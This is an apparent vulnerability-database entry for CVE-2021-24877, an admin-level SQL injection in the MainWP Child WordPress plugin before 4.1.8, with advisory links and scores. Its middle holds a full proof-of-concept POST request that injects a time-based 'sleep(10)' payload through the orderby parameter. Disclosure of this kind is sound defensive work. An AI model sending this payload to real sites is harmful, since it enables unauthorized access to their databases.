Lucene search
JrXnmWPEX-ID:B09FE120-AB9B-44F2-B50D-3B4B299D6D15HistoryOct 25, 2021 - 12:00 a.m.
MainWP Child < 4.1.8 - Admin+ SQL Injection
2021-10-2500:00:00
JrXnm
313
0.001 Low
EPSS
Percentile
37.8%
The plugin does not validate the orderby and order parameter before using them in a SQL statement, leading to an SQL injection exploitable by high privilege users such as admin when the Backup and Staging by WP Time Capsule plugin is installed
POST / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 483
mainwpsignature=si0XH%2BJ%2FLqjlNIbCTuG06uNC%2FNKuv4izJ0lvzYB7bMbNGdRz4un1XDVNMXtblqNeqqF42L1ULDtBhDzGSDgF48RXB5RD4txw9psh3umFdCQYutoFT%2BiluMKxKFUim5L%2Fl3eRTBWIPk4tjNc06amtYzHcwKctIQEzwmnMEtowqK%2BNJmaEQjho185hAtX5rm9QYQmfupIYXHl8pNfPH910x2XMqmuZGWQI%2FC0KwkG%2BfapYWJUWhsTlaBwX7fINW9U7JLvHOr7dN2E80q6wattMEnS%2Fq0pmhCg6mG9Zpq9Q1kIgHP25UJSVkRdBAfcdun4lKPq9pcxmcNVUHcfkWBnkSA%3D%3D&nonce=1111&nossl=0&function=time_capsule&mwp_action=get_logs_rows&orderby=1+and+sleep(10)--+-&order=Related
wpvulndb
wpvulndb
MainWP Child < 4.1.8 - Admin+ SQL Injection
2021-10-25 00:00:00
nvd
nvd
CVE-2021-24877
2021-11-23 20:15:10
patchstack
patchstack
cvelist
cvelist
CVE-2021-24877 MainWP Child < 4.1.8 - Admin+ SQL Injection
2021-11-23 19:16:17
cve
cve
CVE-2021-24877
2021-11-23 20:15:10
prion
prion
Sql injection
2021-11-23 20:15:00
openvas
openvas
WordPress MainWP Child Plugin < 4.1.8 SQLi Vulnerability
2021-12-06 00:00:00